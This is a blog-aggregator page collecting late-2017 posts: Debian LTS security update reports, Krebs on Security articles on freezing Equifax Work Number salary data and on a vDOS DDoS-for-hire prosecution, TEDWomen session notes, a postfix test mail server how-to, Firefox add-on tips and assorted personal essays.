  • DLA-1165-1. Issued a security update for libpam4j fixing 1 CVE.
  • DLA-1167-1. Issued a security update for ruby-yajl fixing 1 CVE.
  • DLA-1157-1. I uploaded a security update for openssl. The update was prepared by Kurt Roeckx, the maintainer of openssl.

Misc

  • I prepared the security updates for libpam4j (DSA-4025-1) and bchunk (DSA-4026-1) and fixed the same issues in Sid and Buster.

 

Thanks for reading and see you next time.

Krebs on SecurityHow to Opt Out of Equifax Revealing Your Salary History

A KrebsOnSecurity series on how easy big-three credit bureau Equifax makes it to get detailed salary history data on tens of millions of Americans apparently inspired a deeper dive on the subject by Fast Company, which examined how this Equifax division has been one of the company’s best investments. In this post, I’ll show you how to opt out of yet another Equifax service that makes money at the expense of your privacy.

My original report showed how the salary history for tens of millions of employees at some of the world’s largest corporations was available to anyone armed with an employee’s Social Security number and date of birth — information that was stolen on 145.5 million Americans in the recent breach at Equifax.

Equifax took down their salary portal — a service from the company’s Workforce Solutions division known as The Work Number (formerly “TALX“) — just a few hours after my story went live on Oct. 8. The company explained that the site was being disabled for routine maintenance, but Equifax didn’t fully reopen the portal until Nov. 2, following the addition of unspecified “security improvements.”

Fast Company writer Joel Winston’s story examines how some 70,000 companies — including Amazon, AT&T, Facebook, Microsoft, Oracle, Twitter and Wal-Mart — actually pay Equifax to collect, organize, and re-sell their employees’ personal income information and work history.

“A typical employee at Facebook (which also owns Instagram and WhatsApp) may require verification of his employment through TALX when he leases an apartment, updates his immigration status, applies for a loan or public aid, or applies for a new job,” Winston writes. “If his new prospective employer is among the 70,000 approved entities in Equifax’s verifier network with a “permissible purpose,” that company can purchase his employment and income information for about $20.”

While this may sound like a nice and legitimate use of salary data, the point of my original report was that this salary data is also available to anyone who has the Social Security number and date of birth on virtually any person who once worked at a company that uses this Equifax service.

In May 2017, KrebsOnSecurity broke the story of how this same Equifax Workforce portal was abused for an entire year by identity thieves involved in tax refund fraud with the Internal Revenue Service. Fraudsters used SSN and DOB data to reset the 4-digit PINs given to customer employees as a password, and then steal W-2 tax data after successfully answering personal questions about those employees.

Curiously, Equifax claims they have no evidence that anyone was harmed as a result of the year-long pattern of tax fraud related to how easy it was to coax salary and payroll data out of its systems.

“We do not know of any specific fraud incidents linked with the Work Number,” Equifax spokeswoman Marisa Salcines told Fast Company.

This statement sounds suspiciously like what big-three credit bureau Experian told lawmakers in 2014 after they were hauled up to Capitol Hill to explain another breach that was scooped by KrebsOnSecurity: That a Vietnamese man who ran an identity theft service which catered to tax refund fraudsters had access for nine months to more than 200 million consumer records maintained by Experian.

Experian’s suits told lawmakers that no consumers were harmed even as the U.S. Secret Service was busy arresting customers of this identity theft service — nearly all of whom were involved in tax refund fraud and other forms of consumer ID theft.

Loyal readers here will know I have long urged consumers to opt out of letting the big credit bureaus resell your credit file to potential lenders (and, by proxy, to ID thieves), by placing a freeze on their credit files with the Equifax, Experian, Trans Union and Innovis.

In the wake of the Equifax breach, one thing I’ve heard from so many readers that was a big factor in their decision to finally freeze their credit was that the bureaus would no longer be able to profit by selling their credit files.

As it happens, it is possible to opt out of having your salary data sold through Equifax. According to Equifax, this involves placing a free “freeze” on your file with the Work Number. These instructions on how to do that come verbatim from Equifax:

To place a security freeze on your The Work Number employment report, send
your request via mail to:

TALX Corporation
ATTN: Employment Data Report Dept 19-10
11432 Lackland Road
St. Louis, Missouri 63146

Or, you may contact us on the web at http://www.theworknumber.com or call 800-996-7566.

It’s not clear what may be the potential consequences of freezing your file with The Work Number. Fast Company explains the service and its giant database “helps streamline various processes for employers and other agencies, and it helps employees too, Equifax wrote in an emailed statement. The Work Number provides prospective landlords a way to verify an applicant’s income, for instance, or makes it cheaper for human resources departments to examine an applicant’s background.”

Here’s Equifax explaining why consumers might want to leave their files alone:

“Without the Work Number, a lender, property manager or pre-employment screener will call an employer and explain why they need to check on an employee or former employee’s employment or income. That individual has no control over who picks up the phone, whether the right information is actually given out, or if his or her privacy will be respected.”

Neither does the consumer have any control over to whom Equifax gives this data. I for one am taking my chances and freezing my salary data at Equifax. I’ll let you know how it goes.

Before you opt out, you may wish to see which lenders, credit agencies and other entities may have received or attempted to pull your Work Number salary history.

To request a free Employment Data Report, you’ll need to fill out a form at the Work Number website, or make a request by mail, or through a toll-free phone number (1-866-222-5880).

Planet DebianBen Hutchings: Debian LTS work, October 2017

I was assigned 15 hours of work by Freexian's Debian LTS initiative and carried over 9 hours from September. I worked 20 hours and will carry over 4 hours to the next month.

I prepared and uploaded an update to dnsmasq to fix some urgent security issues. I issued DLA-1124-1 for this update.

I prepared and released another update on the Linux 3.2 longterm stable branch (3.2.94) and I began preparing the next update, but I didn't upload an update to Debian.

TEDBreathe and push: Notes from Session 6: Rebuild

Leah Chase is 94 years old and she spent the morning, as she always does, cooking at her restaurant. She brings lessons from a life of activism and speaking up (and cooking) to the stage at TEDWomen 2017 in New Orleans. Photo: Ryan Lash / TED

We’ve spent the past few days together thinking on big ideas, hard problems and new visions for what the world might be. What will tie it all together? This session on rebuilding — on facing tough questions and finding the inner (and exterior) resources we need to move forward.

Embrace your emotional truth. How we deal with our inner world drives everything, says psychologist Susan David. Every aspect of how we love, how we live, parent and lead is influenced by our emotional agility, how well we approach our emotions with curiosity, courage and compassion. But we need to strip away the toxic rigidity of categorizing emotions as overwhelmingly good or bad,  pushing away the “bad” ones or pretending they don’t exist. And in our society, we’ve adopted a damaging mentality of forcing positivity as a new form of moral correctness. “It’s tyranny of positivity, and it’s cruel, unkind and ineffective,” says David. “We do it to ourselves and we do it to others.” This systematic avoidance and invalidation of our true feelings doesn’t equip us to deal with the world as it is. Yet, how do we conquer something so daunting and painful? David suggests when you feel a strong feeling, to not immediately run for the emotional exists. When she was struggling, journaling provided a way to work through feelings in a healthy and ultimately life-changing way. Tough emotions are a part of our contract with life, she says. It’s up to us to handle them and ourselves with mercy and grace.

It starts with talking — and eating — together. By the time she took the stage by storm, the Queen of Creole Cuisine, Leah Chase, had already started cooking the lunch at her famous restaurant Dooky Chase. Though 94 years old, the activist and restaurateur radiates more life than an eager child, talking about the incredible group of people she has met throughout her life. She laughs at her children for asking her not to be political and proudly states, “You have to be political today. You have to be involved. You have to be part of the system. Look how it was when we couldn’t be a part of the system.” Chase knows too well the progress that has been made for women just in her lifetime — and how much more there is to do. In the midst of the civil rights movement, Dooky Chase served as a space where white and black people came together, where activists planned protests, and where the police entered but did not disturb. To her, it begins with talking, with sitting next to each other and discussing differences and commonalities. Still bustling today, Dooky Chase represents more than a place where people eat: It is symbolic of political transformation as it has “changed the course of America over gumbo and some fried chicken.” And, just in case anyone is concerned that she will retire anytime soon, Chase assures us that so long as she’s living, she will also be doing.

Musimbi Kanyoro is head of the Global Fund for Women, funneling money worldwide into making lives better. Photo: Ryan Lash / TED

Promoting equal generosity. Like so many of the speakers who’ve stood on the TED Women stage this week, Musimbi Kanyoro is the child of a dynamo. Says Kanyoro of her mother, who lived in a farming village in western Kenya: “she was a little bit like Melinda Gates, but with a lot less money.” Her mother supported the education of scores of children and organized the community, especially the women, to solve problems. She embodied isirika, a Maragoli word that means “caring, together, for one another” or “equal generosity.” Today Kanyoro practices isirika on a much larger scale as president and CEO of the Global Fund for Women, one of the world’s leading foundations for gender equality. There are a few principles of isirika that she encourages people to follow: embrace and recognize each other’s common humanity; value each person’s ideas, skills and contributions, no matter how small; those who possess more also enjoy the privilege to give more. “What would happen if we made isirika into our default?” Kanyoro wonders. “What could we achieve for each other? For humanity?” Let’s find out — together.

Deanna Van Buren speaks at TEDWomen 2017 — Bridges, November 1-3, 2017, Orpheum Theatre, New Orleans, Louisiana. Photo: Ryan Lash / TED

Building spaces for justice. The day a 5-year-old Deanna Van Buren was sent home for punching the boy who called her the N-word, she also designed her first healing space. That forest refuge built out of foliage, righteous fury and her mom’s blankets was the first step on a path to architecture school and — following a revelatory visit to a bleak Pennsylvania prison — her current calling designing restorative justice centers. Restorative justice, Deanna explains, is an alternative system that treats crime as a “breach of relationships,” in which “all stakeholders come together to repair the breach.” Prisons and courthouses, on the other hand, are designed for the punitive approach favored by a justice system focused on mass incarceration. With help and ideas from incarcerated men and women as well as from organizations like the Center for Court Innovation, Deanna designed replacements for these unforgiving institutions via restorative justice and economics centers like Restore Oakland, peacemaking spaces in schools, and mobile villages that bring resources to under-resourced communities. These dynamic spaces provide safe venues for dialogue, healing and reconciliation; employment and job training; and social services to help keep people from entering the justice system in the first place. Invoking Cornel West’s belief that “Justice is what love looks like in public,” Deanna concludes by envisioning a future without prisons and by asking a final question: “What would a restorative justice city look like?”

Poet Sunni Patterson and dancer Chanice Holmes perform at TEDWomen 2017 in New Orleans. Photo: Ryan Lash / TED

 

They wanted her / but if they knew her. In an inferno of words and accompanied by the entrancing moves of dancer Chanice Holmes, poet Sunni Patterson sets the TEDWomen stage ablaze with a magicked ode to Black women, wild and untamed despite conscious (and failed) attempts to subdue them. “This winding Niger river of a woman / one who is unafraid to tear away / only to roam and then become the wind,“ recites Patterson. “She who speaks in gusts and cyclones / blasting us back to high ground, high consciousness / she turns and so does the world.”

Anjali Kumar is a “none” — a person with no professed religion, but lots of questions. She explored them onstage at TEDWomen 2017. Photo: Stacie McChesney / TED

A failed mission to find God. Sometimes a journey of discovery reveals truths we did not expect to find. More than 50 million people in the United States identify themselves as “none,” or not affiliated with a particular religion, but author and attorney AnjaliKumar found that most believe that there is a God, “We’re just not sure who it is.” With that in mind, Kumar went on a mission to define her own version of spirituality. Eschewing “big box” religions, Kumar spent time with witches in New York, a shaman in Peru and even placed a call to God from Burning Man, but it wasn’t until word spread of her planned trip to see an infamous “healer” in Brazil, did she make a truly remarkable discovery about humankind. Kumar‘s inbox was flooded with requests from friends and strangers, asking her to make requests on their behalf. Despite the diversity of people behind the requests, they generally agreed on what they wanted: good health, happiness and love. So although people may identify themselves with a multitude of identities or even as a “none,” Kumar found that when faced with any version of God, how we differ is less important than how we are the same.

Secrets of the Great Migration. Journalist and author of The Warmth of Other Suns Isabel Wilkerson tells the story of the Great Migration, the outpouring of 6 million African Americans from the Jim Crow South to cities in the North and West, between World War I and the 1970s. “This was the first time in American history that American citizens had to flee the land of their birth just to be recognized as the citizens that they had always been,” she says. It was also the first time in American history that the lowest caste people signaled they had options and were willing to take them, and the first time they had a chance to choose for themselves what they would do with their innate talents. “These people, by their actions, were able to do what the powers that be, North and South, could not or would not do,” she says, “They freed themselves.”

Isabel Wilkerson explores the greatest hidden story of the 20th century — the Great Migration of African Americans to cities of the north for work, safety and escape from Jim Crow. Photo: Stacie McChesney / TED

Revolutionary love is the call of our times. “If you cringe when people say love is the answer — I do too. I’m a lawyer.” Valarie Kaur closes the TEDWomen conference with a blockbuster talk about the revolutionary power of love, the “sweet labor” of actively working to make the world better, to hear each others’ stories, to help us see no one as a stranger. This struggle became personal to her when she gave birth to a son “in a time white nationalists call their great awakening, when far right-wing movements are on the rise around the globe, when hate crimes against Muslims and Sikhs are the highest they have been since 9/11. My son is growing up a little brown boy in a nation more dangerous for him than the one I was given. I will not be able to protect him when others see his body as a terrorist.” How can we begin to live in this world, how can we find the strength to make change? Do like the midwife says: Breathe. Then … push.

Valarie Kaur asks us to re-imagine the power of love at TEDWomen 2017. Photo: Ryan Lash / TED


CryptogramGoogle's Data on Login Thefts

This is interesting research and data:

With Google accounts as a case-study, we teamed up with the University of California, Berkeley to better understand how hijackers attempt to take over accounts in the wild. From March 2016 to March 2017, we analyzed several black markets to see how hijackers steal passwords and other sensitive data.

[...]

Our research tracked several black markets that traded third-party password breaches, as well as 25,000 blackhat tools used for phishing and keylogging. In total, these sources helped us identify 788,000 credentials stolen via keyloggers, 12 million credentials stolen via phishing, and 3.3 billion credentials exposed by third-party breaches.

The report.

Worse Than FailureRepresentative Line: An Exceptional Contract

The life of a contractor can be precarious. Contracts end- sometimes suddenly, and you rarely know what the organization you’re working for is actually like until it’s too late.

Ian S, for example, was contracting for a platform-as-a-service (PAAS) company, adding new features to their existing infrastructure automation system. It was the kind of place that had two copies of the same code-base, maintained side-by-side, just so that a single customer could use a script they’d written eight years prior.

That wasn’t too much of a challenge. The real challenge was that when things went wrong, there was almost no logging, and what little logging they got contained helpful, “[10:14:17] An error occurred” messages.

It wasn’t hard to see why that happened:

try {
    // Entry point to most of the program here
} catch (Exception e) {
    if ( e instanceof ProcessingException ) {
        throw new ProcessingException("An error occurred");
    } else if (e instanceof BatchException ) {
        throw new BatchException("An error occurred");
    } //… more types of exceptions
}

Ian describes this as “Pokemon Exception Handling”: you wrap the entire main method of your app in a single try, so you’re left with a single catch block that’s “gotta catch ’em all”. The use of instanceof is a nice touch, in the awfulness of it.

The developer responsible, John, was involved in a lot of important architectural decisions. For example, John decided “DevOps” and “Agile” meant that any code placed in the production branch needed to go to production, automatically. There were no checks around this, anyone with access to the main repo could merge-and-push.

“We enforce it by practice,” John explained. “We know that all of our developers, even the contractors, will follow the best practices.”

Late, on Friday afternoon, John was working on making some configuration file changes. Among other things, his changes caused the whole program to crash on startup- but not before messing up some rows in the database. That was no problem, he was working on a branch, and running against a local dev environment.

It what John claimed was a “simple mistake”, he merged that branch with master. Then he pushed to the central repo. “It could happen to anyone,” he said. At 4:59PM, on Friday, their entire PAAS configuration and management suite went down. Garbage data was thrown into the database, repeatedly, and since there was no exception handling, the only information they had was “An error occurred.”

Truly, the life of a contractor is perilous, and for management, this became a 4-alarm, hair-on-fire emergency. All hands on deck! Even the contractors!

There was just one problem. The PAAS company had decided that they weren’t going to renew the contract. They had gone further, and announced that with a day’s notice, which left a number of the contractors flapping in the wind, between gigs, Ian included. So at 5:00PM, when he officially didn’t work there anymore, he wished John the best and went home.

[Advertisement] Release! is a light card game about software and the people who make it. Play with 2-5 people, or up to 10 with two copies - only $9.95 shipped!

Planet DebianFrançois Marier: Test mail server on Ubuntu and Debian

I wanted to setup a mail service on a staging server that would send all outgoing emails to a local mailbox. This avoids sending emails out to real users when running the staging server using production data.

First, install the postfix mail server:

apt install postfix

and choose the "Local only" mail server configuration type.

Then change the following in /etc/postfix/main.cf:

default_transport = error

to:

default_transport = local:root

and restart postfix:

systemctl restart postfix.service

Once that's done, you can find all of the emails in /var/mail/root.

So you can install mutt:

apt install mutt

and then view the mailbox like this:

mutt -f /var/mail/root

Don MartiTime-saving tip for Firefox 57

Last time I recommended the Tracking Protection feature in Firefox 57, coming tomorrow. The fast browser is even faster when you block creepy trackers, which are basically untested combinations of third-party JavaScript.

But what about sites that mistakenly detect Tracking Protection as "an ad blocker" and give you grief about it? Do you have to turn Tracking Protection off?

So far I have found that the answer is usually no. I can usually use NJS to turn off JavaScript for that site instead. (After all, if a web developer can't tell an ad blocker from a tracking protection tool, I don't trust their JavaScript anyway.)

NJS will also deal with a lot of "growth hacking" tricks such as newsletter signup forms that appear in front of the main article. And it defaults to on, so that sites with JavaScript will work normally until I decide that they're better off without it.

Entering the Quantum Era—How Firefox got fast again and where it’s going to get faster by Lin Clark

How to turn Tracking Protection on

Don MartiI'm taking a Bitcoin risk even though I don't hold Bitcoin. Please regulate me.

In the country where I live, kidnapping for ransom is not a very common crime.

That's because picking up the ransom is too risky.

It's easy to kidnap someone, and easy to let the person go when the ransom is paid, but picking up the ransom exposes you. Wannabe kidnappers who are motivated by money tend to choose other crimes.

As the [family relationship redacted] of a [family member information redacted], I'm happy that kidnapping is difficult here. High transaction costs for some kinds of transaction are a good thing.

Now, here comes Bitcoin.

As we're already seeing with ransomware, harder-to-trace ransom drops are now a thing.

So, even though I don't actually hold Bitcoin, someone could grab my family member (low risk), demand that I exchange some of my conventional assets for Bitcoin (low risk) and send the Bitcoin as ransom (low risk). The balance between risk and reward for the crime of kidnapping for ransom has changed.

IMHO this is a bigger problem than any of the reasons that Charles Stross wants Bitcoin to die in a fire.

So what to do about it?

Move the risks where the profits are.

Make the Bitcoin business eat the costs of payments made under duress.

New rule: If I ever trade any assets for Bitcoin in order to comply with a threat, and then transfer the Bitcoin under duress (kidnapping, ransomware, whatever), then I can go back to whoever I gave the assets to with a copy of the police report on the incident and get my original assets (and any fees) back.

Yes, that makes it harder for regular people to trade assets for Bitcoin. Exchanges would have to hold the money for a while, check that I'm not under duress, and probably do all kinds of other pain-in-the-ass, possibly costly, work. But I'd rather have that than the alternative.

Planet Linux AustraliaLev Lafayette: Rattus Norvegicus ESTs with BLAST and Slurm

The following is a short tutorial on using BLAST with Slurm using fasta nucleic acid (fna) FASTA formatted sequence files for Rattus Norvegicus. It assumes that BLAST (Basic Local Alignment Search Tool) is already installed.

First, create a database directory, download the datafile, extract, and load the environment variables for BLAST.


mkdir -r ~/applicationtests/BLAST/dbs
cd ~/applicationtests/BLAST/dbs
wget ftp://ftp.ncbi.nih.gov/refseq/R_norvegicus/mRNA_Prot/rat.1.rna.fna.gz
gunzip rat.1.rna.fna.gz
module load BLAST/2.2.26-Linux_x86_64

Having extracted the file, there will be a fna formatted sequence file, rat.1.rna.fna. An example header line for a sequence:

>NM_175581.3 Rattus norvegicus cathepsin R (Ctsr), mRNA

read more

,

Planet DebianLars Wirzenius: Unit and integration testing: an analogy with cars

A unit is a part of your program you can test in isolation. You write unit tests to test all aspects of it that you care about. If all your unit tests pass, you should know that your unit works well.

Integration tests are for testing that when your various well-tested, high quality units are combined, integrated, they work together. Integration tests test the integration, not the individual units.

You could think of building a car. Your units are the ball bearings, axles, wheels, brakes, etc. Your unit tests for the ball bearings might test, for example, that they can handle a billion rotations, at various temperatures, etc. Your integration test would assume the ball bearings work, and should instead test that the ball bearings are installed in the right way so that the car, as whole, can run a kilometers, and accelerate and brake every kilometer, uses only so much fuel, produces only so much pollution, and doesn't kill passengers in case of a crash.

Planet DebianSven Hoexter: Offering a Simtec Entropy Key

Since I started to lean a bit towards the concept of minimalism I've got rid of stuff, including all stationary computers. So for now I'm left with just my laptop and that's something where I do not want to attach an USB entropy key permanently. That's why I've a spare Simtec Entropy Key I no longer use, and I'm willing to sell.

In case someone is interested, I'm willing to give it away for 20EUR + shipping. If you can convince me it'll be of use for the Debian project (end up on a DSA managed machine for example) I'm willing to give it away for less. If you're located in Cologne, Copenhagen or Barcelona we might be able, depending on the timing, to do a personal handover (with or without keysigning). Otherwise I guess shipping is mainly interesting for someone also located in Europe.

You can use sven at stormbind dot net or hoexter at debian dot org to contact me and use GPG key 0xA6DC24D9DA2493D1.

Planet DebianBen Armstrong: The Joy of Cat Intelligence

As a cat owner, being surprised by cat intelligence delights me. They’re not exactly smart like a human, but they are smart in cattish ways. The more I watch them and try to sort out what they’re thinking, the more it pleases me to discover they can solve problems and adapt in recognizably intelligent ways, sometimes unique to each individual cat. Each time that happens, it evokes in me affectionate wonder.

Today, I had one of those joyful moments.

First, you need to understand that some months ago, I thought I had my male cat all figured out with respect to mealtimes. I had been cleaning up after my oafish boy who made a watery mess on the floor from his mother’s bowl each morning. I was slightly annoyed, but was mostly curious, and had a hunch. A quick search of the web confirmed it: my cat was left-handed. Not only that, but I learned this is typical for males, whereas females tend to be right-handed. Right away, I knew what I had to do: I adjusted the position of their water bowls relative to their food, swapping them from right to left; the messy morning feedings ceased. I congratulated myself for my cleverness.

You see, after the swap, as he hooked the kibbles with his left paw out of the right-hand bowl, they would land immediately on the floor where he could give them chase. The swap caused the messes to cease because before, his left-handed scoops would land the kibbles in the water to the right; he would then have to scoop the kibble out onto the floor, sprinkling water everywhere! Furthermore, the sodden kibble tended to not skitter so much, decreasing his fun. Or so I thought. Clearly, I reasoned, having sated himself on the entire contents of his own bowl, he turned to pilfering his mother’s leftovers for some exciting kittenish play. I had evidence to back it up, too: he and his mother both seem to enjoy this game, a regular fixture of their mealtime routines. She, too, is adept at hooking out the kibbles, though mysteriously, without making a mess in her water, whichever way the bowls are oriented. I chalked this up to his general clumsiness of movement vs. her daintiness and precision, something I had observed many times before.

Come to think of it, lately, I’ve been seeing more mess around his mother’s bowl again. Hmm. I don’t know why I didn’t stop to consider why …

And then my cat surprised me again.

This morning, with Shadow behind my back as I sat at my computer, finishing up his morning meal at his mother’s bowl, I thought I heard something odd. Or rather, I didn’t hear something. The familiar skitter-skitter sound of kibbles evading capture was missing. So I turned and looked. My dear, devious boy had squished his overgrown body behind his mother’s bowls, nudging them ever so slightly askew to fit the small space. Now the bowl orientation was swapped back again. Stunned, I watched him carefully flip out a kibble with his left paw. Plop! Into the water on the right. Concentrating, he fished for it. A miss! He casually licked the water from his paw. Another try. Swoop! Plop, onto the floor. No chase now, just satisfied munching of his somewhat mushy kibble. And then it dawned on me that I had got it somewhat wrong. Yes, he enjoyed Chase the Kibble, like his mom, but I never recognized he had been indulging in a favourite pastime, peculiarly his own …

I had judged his mealtime messes as accidents, a very human way of thinking about my problem. Little did I know, it was deliberate! His private game was Bobbing for Kibbles. I don’t know if it’s the altered texture, or dabbling in the bowl, but whatever the reason, due to my meddling, he had been deprived of this pleasure. No worries, a thwarted cat will find a way. And that is the joy of cat intelligence.

Planet Linux AustraliaLinux Users of Victoria (LUV) Announce: LUV Main December 2017 Meeting

Dec 5 2017 18:30
Dec 5 2017 20:30
Dec 5 2017 18:30
Dec 5 2017 20:30
Location: 
Mail Exchange Hotel, 688 Bourke St, Melbourne VIC 3000

PLEASE NOTE NEW LOCATION

Speakers to be announced.

Mail Exchange Hotel, 688 Bourke St, Melbourne VIC 3000

Food and drinks will be available on premises.

Linux Users of Victoria is a subcommittee of Linux Australia.

December 5, 2017 - 18:30

Planet Linux AustraliaLinux Users of Victoria (LUV) Announce: LUV November 2017 Workshop: Status at a glance with LCDproc

Nov 18 2017 12:30
Nov 18 2017 16:30
Nov 18 2017 12:30
Nov 18 2017 16:30
Location: 
Infoxchange, 33 Elizabeth St. Richmond

Status at a glance with LCDproc

Andrew Pam will demonstrate how to use small LCD or LED displays to provide convenient status information using LCDproc.  Possibly also how to write custom modules to display additional information.

The meeting will be held at Infoxchange, 33 Elizabeth St. Richmond 3121 (enter via the garage on Jonas St.) Late arrivals, please call (0421) 775 358 for access to the venue.

LUV would like to acknowledge Infoxchange for the venue.

Linux Users of Victoria is a subcommittee of Linux Australia.

November 18, 2017 - 12:30

read more

Planet DebianRuss Allbery: Review: Night Moves

Review: Night Moves, by Pat Green

Publisher: Aquarius
Copyright: 2014
ISBN: 0-9909741-1-1
Format: Kindle
Pages: 159

In the fall of 2012, Pat Green was a preacher of a failing church, out of a job, divorced for six months, and feeling like a failure at every part of his life. He was living in a relative's house and desperately needed work and his father had been a taxi driver. So he got a job as a 6pm to 6am taxi driver in his home town of Joliet, Illinois. That job fundamentally changed his understanding of the people who live in the night, how their lives work, and what it means to try to help them.

This is nonfiction: a collection of short anecdotes about life as a cab driver and the people who have gotten a ride in Green's cab. They're mostly five or six pages long, just a short story or window into someone's life. I ran across Pat Green's writing by following a sidebar link from a post on Patheos (probably from Love, Joy, Feminism, although I no longer remember). Green has an ongoing blog on Patheos about raising his transgender son (who appears in this collection as a lesbian daughter; he wasn't out yet as transgender when this was published), which is both a good sample of his writing and occasionally has excerpts from this book.

Green's previous writing experience, as mentioned at several points in this collection, was newspaper columns in the local paper. It shows: these essays have the succinct, focused, and bite-sized property of a good newspaper article (or blog post). The writing is a little rough, particularly the remembered dialogue that occasionally falls into the awkward valley between dramatic, constructed fictional dialogue and realistic, in-the-moment speech. But the stories are honest and heartfelt and have the self-reflective genuineness of good preaching paired with a solid sense of narrative. Green tries to observe and report first, both the other person and his own reactions, and only then try to draw more general conclusions.

This book is also very hard to read. It's not a sugar-coated view of people who live in the night of a city, nor is it constructed to produce happy endings. The people who Green primarily writes about are poor, or alone, or struggling. The story that got me to buy this book, about taking a teenage girl to a secret liaison that turned out to be secret because her liaison was another girl, is heartwarming but also one of the most optimistic stories here. A lot of people die or just disappear after being regular riders for some time. A lot of people are desperate and don't have any realistic way out. Some people, quite memorably, think they have a way out, and that way out closes on them.

The subtitle of this book is "An Ex-Preacher's Journey to Hell in a Taxi" and (if you followed the link above) you'll see that Green is writing in the Patheos nonreligious section. The other theme of this collection is the church and its effect on the lives of people who are trying to make a life on the outskirts of society. That effect is either complete obliviousness or an active attempt to make their lives even worse. Green lays out the optimism that he felt early in the job, the hope that he could help someone the way a pastor would, guide her to resources, and how it went horribly wrong when those resources turned out to not be interested in helping her at all. And those stories repeat, and repeat.

It's a book that makes it very clear that the actual practice of Christianity in the United States is not about helping poor or marginalized people, but there are certainly plenty of Christian resources for judging, hurting people, closing doors, and forcing abused people back into abusive situations, all in the name of God. I do hope some Christians read this and wince very hard. (And lest the progressive Christians get too smug, one of the stories says almost as brutal things about liberal ministries as the stories of conservative ones.)

I came away feeling even more convinced by the merits of charities that just give money directly to poor people. No paternalism, no assuming that rich people know what they need, no well-meaning intermediary organizations with endless rules, just resources delivered directly to the people who most need resources. Ideally done by the government and called universal basic income. Short of constructing a functional government that builds working public infrastructure, and as a supplement even if one has such a government (since infrastructure can't provide everything), it feels like the most moral choice. Individual people may still stay mired in awful situations, but at least that isn't compounded by other people taking their autonomy away and dictating life to them in complete ignorance.

This is a fairly short and inexpensive book. I found it very much worth reading, and may end up following Green's blog as well. There are moments of joy and moments of human connection, and the details of the day-to-day worries and work style of a taxi driver (in this case, one who drives a company car) are pretty interesting. (Green does skip over some parts for various reasons, such as a lot of the routine fares and most of the stories of violence, but does mention what he's skipping over.) But it's also a brutal book, because so many people are hurting and there isn't much Green can do about it except bear witness and respect them as people in a way that religion doesn't.

Recommended, but brace yourself.

Rating: 8 out of 10

Planet Linux AustraliaClinton Roy: Access and Memory: Open GLAM and Open Source

Over the years of my involvement with library projects, like Coder Dojo, programming workshops and such, I’ve struggled to nail down the intersection between libraries and open source. At this years linux.conf.au in Sydney (my seventeenth!) I’m helping to put together a miniconf to answer this question: Open GLAM. If you do work in the intersection of galleries, libraries, archives, musuems and open source, we’d love to hear from you.


Filed under: lca, oss, Uncategorized

,

Don Martimy Firefox 57 add-ons

Firefox 57 is coming on Tuesday, and as you may have heard, add-ons must use the WebExtensions API. I have been running Firefox Nightly for a while, so add-on switching came for me early. Here is what I have come up with.

The basic set

Privacy Badger is not on here just because I'm using Firefox Tracking Protection. I like both.

Blogging, development and testing

  • blind-reviews. This is an experiment to help break your own habits of bias when reviewing code contributions. It hides the contributor name and email when you first see the code, and you can reveal it later. Right now it just does Bugzilla, but watch this space for an upcoming GitHub version. (more info)

  • Copy as Markdown. Not quite as full-featured as the old "Copy as HTML Link" but still a time-saver for blogging. Copy both the page title and URL, formatted as Markdown, for pasting into a blog.

  • Firefox Pioneer. Participate in Firefox user research. Studies have extremely strict and detailed privacy policies.

  • Test Pilot. Try new Firefox features. Tracking Protection was on Test Pilot for a while. Right now there is a new speech recognition one, an in-browser notepad, and more.

Advanced (for now) nerdery

  • Cookie AutoDelete. Similar to the old "Self-Destructing Cookies". Cleans up cookies after leaving a site. Useful but requires me to whitelist the sites where I want to stay logged in. More time-consuming than other privacy tools.

  • PrivacyPass. This is new. Privacy Pass interacts with supporting websites to introduce an anonymous user-authentication mechanism. In particular, Privacy Pass is suitable for cases where a user is required to complete some proof-of-work (e.g. solving an internet challenge) to authenticate to a service. Right now I don't use any sites that have it, but it could be a great way to distribute "tickets" for reading articles or leaving comments.

Note on ad blocking

If you run an ad blocker, the pre-57 add-ons check is a good time to make sure that you're not compromising your privacy by participating in a paid whitelisting scheme. As long as you have to go through your add-ons anyway, it's a great time to ditch AdBlock Plus or Adblock. They're taking advantage of users to shake down web sites.

What to use instead? For most people, either the built-in Firefox Tracking Protection or EFF's Privacy Badger will provide good protection. I would try one or both of those before a conventional ad blocker. If sites have a broken ad blocker detector that falsely identifies a tracking protection tool as an ad blocker, you can usually get around it by turning off JavaScript for that site with NJS.

If you still want to get rid of more ads and join the blocker vs. anti-blocker game (I don't), there's always uBlock Origin, which does not do paid whitelisting. The project site has more info). But try either the built-in tracking protection or Privacy Badger first.

New Firefox Quantum arrives November 14, 2017

Firefox Quantum 57 for developers

Rondam RamblingsBattling racism in a free society

A week ago I wrote a tiny, almost throwaway, article entitled, "Racism is Alive and Well in America."  It was more of a spur-of-the-moment reaction to John Kelly's egregious and historically ignorant attempt at Confederate apologetics, which culminated in (but did not start with) his now infamous quote that the American Civil War was a result of an "the lack of an ability to compromise." That

,

CryptogramFriday Squid Blogging: Squid Season May Start Earlier Next Year

Squid fisherman in Argentina have asked regulators to start the squid season earlier in 2018.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.

Planet DebianPaulo Santana: Hello world

I'm Debian Maintainer since january 2017.

Rondam RamblingsThe Bitcoin apocalypse is coming in mid-November to a block chain near you

[UPDATE: This post was originally said that the SegWit2X fork will happen on November 1.  In fact it is scheduled to occur on block 494,764 .  It is impossible to predict exactly when this will happen, but at current hash rates it will probably be some time in mid-to-late November.  The post has been edited to reflect this.] [UPDATE2: Chaos has been averted.  The Segwit2x faction blinked.] Back

Krebs on SecurityHack of Attack-for-Hire Service vDOS Snares New Mexico Man

A New Mexico man is facing federal hacking charges for allegedly using the now defunct attack-for-hire service vDOS to launch damaging digital assaults aimed at knocking his former employer’s Web site offline. Prosecutors were able to bring the case in part because vDOS got massively hacked last year, and its customer database of payments and targets leaked to this author and to the FBI.

Prosecutors in Minnesota have charged John Kelsey Gammell, 46, with using vDOS and other online attack services to hurl a year’s worth of attack traffic at the Web sites associated with Washburn Computer Group, a Minnesota-based company where Gammell used to work.

vDOS as it existed on Sept. 8, 2016.

vDOS existed for nearly four years, and was known as one of the most powerful and effective pay-to-play tools for launching distributed denial-of-service (DDoS) attacks. The vDOS owners used a variety of methods to power their service, including at least one massive botnet consisting of tens of thousands of hacked Internet of Things (IoT) devices, such as compromised Internet routers and security cameras. vDOS also was used in numerous DDoS attacks against this site.

Investigators allege that although Gammell used various methods to hide his identity, email addresses traced back to him were found in the hacked user and target databases from vDOS.

